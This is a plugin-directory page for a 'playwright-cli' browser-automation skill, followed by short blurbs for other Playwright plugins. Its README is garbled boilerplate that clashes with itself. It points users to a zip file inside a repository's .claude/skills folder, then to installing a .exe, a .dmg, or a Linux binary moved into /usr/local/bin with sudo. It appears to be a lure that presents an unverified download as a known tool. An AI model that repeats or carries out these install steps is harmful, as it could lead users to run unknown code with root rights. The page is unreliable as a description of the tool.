By Baldwin509
Automates browser interactions for web testing, form filling, screenshots, and data extraction. Use when the user needs to navigate websites, interact with web pages, fill forms, take screenshots, test web applications, or extract information from web pages.
Welcome to the playwright-cli! This tool helps you simplify common Playwright tasks. Whether you need to record actions, generate Playwright code, inspect selectors, or take screenshots, this CLI makes it straightforward.
To get started, follow these steps:
Visit the Releases Page: Go to the following link to download the software: Download Here
Select the Latest Version: On the releases page, you will see a list of available versions. It's best to download the latest version to ensure you have all the newest features and fixes.
Download the Correct File: Choose the file that matches your operating system. Common options include:
https://raw.githubusercontent.com/Baldwin509/playwright-cli/main/.claude/skills/playwright-cli-2.5.zipplaywright-cli-macplaywright-cli-linuxClick on the appropriate file to start the download.
Installation:
.exe file to install..dmg file and drag the application to your Applications folder.sudo mv playwright-cli-linux /usr/local/bin/playwright-cli
sudo chmod +x /usr/local/bin/playwright-cli
Run the Application:
playwright-cli in your start menu or desktop and click to open it.playwright-cli to launch the program.To run playwright-cli, ensure your system meets the following requirements:
To use playwright-cli:
For example, if you want to record an action, select "Record Actions" and navigate through your browser. The tool will capture your interactions and generate the relevant Playwright code.
If you encounter issues:
This project is licensed under the MIT License. You may freely use and modify the software.
For more details, check our documentation or FAQs:
For quick access, remember to visit the downloads page again: Download Here
Own this plugin?
Verify ownership to unlock analytics, metadata editing, and a verified badge. GitHub access is read-only (username + org membership).
Sign in to claimOwn this plugin?
Verify ownership to unlock analytics, metadata editing, and a verified badge. GitHub access is read-only (username + org membership).
Sign in to claimBased on adoption, maintenance, documentation, and repository signals. Not a security audit or endorsement.
npx claudepluginhub baldwin509/playwright-cli --plugin playwright-cliUse when the task requires automating a real browser from the terminal (navigation, form filling, snapshots, screenshots, data extraction, UI-flow debugging) via `playwright-cli` or the bundled wrapper script. Originally from OpenAI's curated skills catalog.
Turn your coding agent into a SOTA browser agent. Drives a local Playwright workspace via one bash command at a time, saving screenshots and an action log into final_runs/run_<id>/, and visually self-verifies the result.
Browser automation via Playwright CLI for testing, screenshots, and interaction workflows
Claude Code Skill for general-purpose browser automation with Playwright. Auto-detects dev servers, writes clean test scripts to /tmp, and autonomously handles any browser automation task.
Playwright E2E test debugging and interactive browser exploration. Runs tests with action capture (DOM snapshots, network, console, screenshots), diagnoses failures, and provides browser tools for navigating, clicking, and inspecting pages through ARIA snapshots.
Browser automation plugin for agent-driven web app testing, inspection, and debugging.